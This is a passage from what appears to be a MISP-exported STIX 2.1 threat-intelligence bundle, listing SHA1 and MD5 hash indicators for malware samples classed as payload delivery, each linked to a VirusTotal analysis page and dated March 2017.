"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8288-93b0-46a5-a2ec-402a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:48.000Z",
|
|
"modified": "2017-03-29T09:46:48.000Z",
|
|
"description": "Associated sample - Xchecked via VT: cc74ef19129d061ba97801839ff04c00df07f684ff62df89061d7694c3a9c244",
|
|
"pattern": "[file:hashes.SHA1 = '6eb6dfc7e69a96dbf68d9929cb46acc6c75d507a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8289-d6a8-4330-b291-4c5102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:49.000Z",
|
|
"modified": "2017-03-29T09:46:49.000Z",
|
|
"description": "Associated sample - Xchecked via VT: cc74ef19129d061ba97801839ff04c00df07f684ff62df89061d7694c3a9c244",
|
|
"pattern": "[file:hashes.MD5 = 'eb0976f1fa1c1cf74d9ff11c55fb4a5a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db828a-9818-4d3c-96fe-48c902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:50.000Z",
|
|
"modified": "2017-03-29T09:46:50.000Z",
|
|
"first_observed": "2017-03-29T09:46:50Z",
|
|
"last_observed": "2017-03-29T09:46:50Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db828a-9818-4d3c-96fe-48c902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db828a-9818-4d3c-96fe-48c902de0b81",
|
|
"value": "https://www.virustotal.com/file/cc74ef19129d061ba97801839ff04c00df07f684ff62df89061d7694c3a9c244/analysis/1437034820/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db828b-83f4-478b-aa89-42f302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:51.000Z",
|
|
"modified": "2017-03-29T09:46:51.000Z",
|
|
"description": "Associated sample - Xchecked via VT: d0b44b803893fc08c08c653b2e0ca2ca2e2f52ef8cd49f0ac145337af5b2175f",
|
|
"pattern": "[file:hashes.SHA1 = '4ff2e4e074a2bd9feec0f147b28921d9939273cc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db828c-91d0-4ff9-b139-465c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:52.000Z",
|
|
"modified": "2017-03-29T09:46:52.000Z",
|
|
"description": "Associated sample - Xchecked via VT: d0b44b803893fc08c08c653b2e0ca2ca2e2f52ef8cd49f0ac145337af5b2175f",
|
|
"pattern": "[file:hashes.MD5 = 'dc75db5d3cc992ecc0dc7562ac39b1a6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db828d-1dbc-4d14-a3e7-487902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:53.000Z",
|
|
"modified": "2017-03-29T09:46:53.000Z",
|
|
"first_observed": "2017-03-29T09:46:53Z",
|
|
"last_observed": "2017-03-29T09:46:53Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db828d-1dbc-4d14-a3e7-487902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db828d-1dbc-4d14-a3e7-487902de0b81",
|
|
"value": "https://www.virustotal.com/file/d0b44b803893fc08c08c653b2e0ca2ca2e2f52ef8cd49f0ac145337af5b2175f/analysis/1449738411/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db828d-cfc8-49c6-8983-48b202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:53.000Z",
|
|
"modified": "2017-03-29T09:46:53.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 590a4dedb34956e454d384e882440e731d50a83a819cfef000596d165a7d32c5",
|
|
"pattern": "[file:hashes.SHA1 = '83b98ed144281fd88a72f35b4929972c9fb7af1d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db828e-34e8-4c4c-8ce0-4a5202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:54.000Z",
|
|
"modified": "2017-03-29T09:46:54.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 590a4dedb34956e454d384e882440e731d50a83a819cfef000596d165a7d32c5",
|
|
"pattern": "[file:hashes.MD5 = '277fa0d9f22f0ae6a11f2d2971fa5f36']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db828f-c9c4-47cd-a241-45c802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:55.000Z",
|
|
"modified": "2017-03-29T09:46:55.000Z",
|
|
"first_observed": "2017-03-29T09:46:55Z",
|
|
"last_observed": "2017-03-29T09:46:55Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db828f-c9c4-47cd-a241-45c802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db828f-c9c4-47cd-a241-45c802de0b81",
|
|
"value": "https://www.virustotal.com/file/590a4dedb34956e454d384e882440e731d50a83a819cfef000596d165a7d32c5/analysis/1452373312/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8290-f61c-44f2-92fe-4f8a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:56.000Z",
|
|
"modified": "2017-03-29T09:46:56.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 913589ca3fa86f9de6582204040753c779dd830e33876de338683587d7498766",
|
|
"pattern": "[file:hashes.SHA1 = '0d4f4f828a59d908e7b288f869c70882142892ca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8291-c714-47da-88f3-46df02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:57.000Z",
|
|
"modified": "2017-03-29T09:46:57.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 913589ca3fa86f9de6582204040753c779dd830e33876de338683587d7498766",
|
|
"pattern": "[file:hashes.MD5 = '3d6708486aa15e23b4df6ef1d90bf6d4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8292-010c-43a1-b3a8-4c0d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:58.000Z",
|
|
"modified": "2017-03-29T09:46:58.000Z",
|
|
"first_observed": "2017-03-29T09:46:58Z",
|
|
"last_observed": "2017-03-29T09:46:58Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8292-010c-43a1-b3a8-4c0d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8292-010c-43a1-b3a8-4c0d02de0b81",
|
|
"value": "https://www.virustotal.com/file/913589ca3fa86f9de6582204040753c779dd830e33876de338683587d7498766/analysis/1465243515/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8293-8378-4a15-bbcf-467c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:59.000Z",
|
|
"modified": "2017-03-29T09:46:59.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 7dcda64fdfb2069f3b5f5047cfac6f2abfb6a2fb7591f974e5c0348ae86b6909",
|
|
"pattern": "[file:hashes.SHA1 = 'eb9079ec391ac90526a5475144796e857f9ac24d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8294-8d68-4b1e-96be-4f2302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:00.000Z",
|
|
"modified": "2017-03-29T09:47:00.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 7dcda64fdfb2069f3b5f5047cfac6f2abfb6a2fb7591f974e5c0348ae86b6909",
|
|
"pattern": "[file:hashes.MD5 = 'afcdf082f0c86ae60e8c2c93fc5267ff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8295-bc6c-436b-b5eb-4a6c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:01.000Z",
|
|
"modified": "2017-03-29T09:47:01.000Z",
|
|
"first_observed": "2017-03-29T09:47:01Z",
|
|
"last_observed": "2017-03-29T09:47:01Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8295-bc6c-436b-b5eb-4a6c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8295-bc6c-436b-b5eb-4a6c02de0b81",
|
|
"value": "https://www.virustotal.com/file/7dcda64fdfb2069f3b5f5047cfac6f2abfb6a2fb7591f974e5c0348ae86b6909/analysis/1449493781/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8296-28f8-4c12-813c-455102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:02.000Z",
|
|
"modified": "2017-03-29T09:47:02.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 1d0a9d2e3c08f54b95575e4341f1d9699eb29ddbcf45757b1814ceabc9418a03",
|
|
"pattern": "[file:hashes.SHA1 = '469351ba6e13d88e9c543bfb718cbffe2c7e39f3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8297-e090-40de-a40e-4f7b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:03.000Z",
|
|
"modified": "2017-03-29T09:47:03.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 1d0a9d2e3c08f54b95575e4341f1d9699eb29ddbcf45757b1814ceabc9418a03",
|
|
"pattern": "[file:hashes.MD5 = '0311c5c1c8f7f504e89f76832ccd75b8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:03Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8298-4e80-405c-bf05-4eb602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:04.000Z",
|
|
"modified": "2017-03-29T09:47:04.000Z",
|
|
"first_observed": "2017-03-29T09:47:04Z",
|
|
"last_observed": "2017-03-29T09:47:04Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8298-4e80-405c-bf05-4eb602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8298-4e80-405c-bf05-4eb602de0b81",
|
|
"value": "https://www.virustotal.com/file/1d0a9d2e3c08f54b95575e4341f1d9699eb29ddbcf45757b1814ceabc9418a03/analysis/1453221774/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8299-2994-4a18-a285-4eae02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:05.000Z",
|
|
"modified": "2017-03-29T09:47:05.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 417addbd5817cc9dcf4f77f6240a56cd11a94c9a89e646d589e5ed26710cbcac",
|
|
"pattern": "[file:hashes.SHA1 = '01848f898143fe20c8adf0de0b18b4349d4387cc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8299-fc10-423f-a91f-4af502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:05.000Z",
|
|
"modified": "2017-03-29T09:47:05.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 417addbd5817cc9dcf4f77f6240a56cd11a94c9a89e646d589e5ed26710cbcac",
|
|
"pattern": "[file:hashes.MD5 = 'c7502c002c91e086b0ba07d9014f595a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db829a-9108-4e3b-963e-424b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:06.000Z",
|
|
"modified": "2017-03-29T09:47:06.000Z",
|
|
"first_observed": "2017-03-29T09:47:06Z",
|
|
"last_observed": "2017-03-29T09:47:06Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db829a-9108-4e3b-963e-424b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db829a-9108-4e3b-963e-424b02de0b81",
|
|
"value": "https://www.virustotal.com/file/417addbd5817cc9dcf4f77f6240a56cd11a94c9a89e646d589e5ed26710cbcac/analysis/1434536121/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db829b-8190-404b-b889-414f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:07.000Z",
|
|
"modified": "2017-03-29T09:47:07.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 2cedcdaa116feed52819914db3f19edf58c004a4a28c62f556d2ce3ced84b0f6",
|
|
"pattern": "[file:hashes.SHA1 = '7cb19fdbaa03c2b1b2bc19b3ec324e599671750e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db829c-8644-4a5c-8ebc-476502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:08.000Z",
|
|
"modified": "2017-03-29T09:47:08.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 2cedcdaa116feed52819914db3f19edf58c004a4a28c62f556d2ce3ced84b0f6",
|
|
"pattern": "[file:hashes.MD5 = '9f2a765aa6ffdc6aae3582e949c7cfab']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db829d-4868-4565-aa57-4dc302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:09.000Z",
|
|
"modified": "2017-03-29T09:47:09.000Z",
|
|
"first_observed": "2017-03-29T09:47:09Z",
|
|
"last_observed": "2017-03-29T09:47:09Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db829d-4868-4565-aa57-4dc302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db829d-4868-4565-aa57-4dc302de0b81",
|
|
"value": "https://www.virustotal.com/file/2cedcdaa116feed52819914db3f19edf58c004a4a28c62f556d2ce3ced84b0f6/analysis/1436852670/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db829e-ff18-4a49-8fda-437902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:10.000Z",
|
|
"modified": "2017-03-29T09:47:10.000Z",
|
|
"description": "Associated sample - Xchecked via VT: e64678633c8e876fc9313bfe5a8401953eaefdd8e7e006221cd5009f471fc389",
|
|
"pattern": "[file:hashes.SHA1 = '049454bfeee043860b02eb00832a26f64bcbc2ce']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db829f-1570-4b80-b8dc-493102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:11.000Z",
|
|
"modified": "2017-03-29T09:47:11.000Z",
|
|
"description": "Associated sample - Xchecked via VT: e64678633c8e876fc9313bfe5a8401953eaefdd8e7e006221cd5009f471fc389",
|
|
"pattern": "[file:hashes.MD5 = '8c10ad95742af4b09a2223e853a2dc08']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82a0-fa6c-47ce-af37-4a2102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:12.000Z",
|
|
"modified": "2017-03-29T09:47:12.000Z",
|
|
"first_observed": "2017-03-29T09:47:12Z",
|
|
"last_observed": "2017-03-29T09:47:12Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82a0-fa6c-47ce-af37-4a2102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82a0-fa6c-47ce-af37-4a2102de0b81",
|
|
"value": "https://www.virustotal.com/file/e64678633c8e876fc9313bfe5a8401953eaefdd8e7e006221cd5009f471fc389/analysis/1445745957/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82a1-bdf4-4c98-9fd0-4ffd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:13.000Z",
|
|
"modified": "2017-03-29T09:47:13.000Z",
|
|
"description": "Associated sample - Xchecked via VT: aaa1511a156a11cff7e09367184972c067b65cae6573a8b4844dbe0a01894118",
|
|
"pattern": "[file:hashes.SHA1 = 'e068f21f469cd87d725ae7c7b3acc0ae445ff607']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82a2-e428-4b09-b584-4f8702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:14.000Z",
|
|
"modified": "2017-03-29T09:47:14.000Z",
|
|
"description": "Associated sample - Xchecked via VT: aaa1511a156a11cff7e09367184972c067b65cae6573a8b4844dbe0a01894118",
|
|
"pattern": "[file:hashes.MD5 = 'cd599754c2e19aae137beae347c617b9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82a3-3618-4f6e-8e36-4f7002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:15.000Z",
|
|
"modified": "2017-03-29T09:47:15.000Z",
|
|
"first_observed": "2017-03-29T09:47:15Z",
|
|
"last_observed": "2017-03-29T09:47:15Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82a3-3618-4f6e-8e36-4f7002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82a3-3618-4f6e-8e36-4f7002de0b81",
|
|
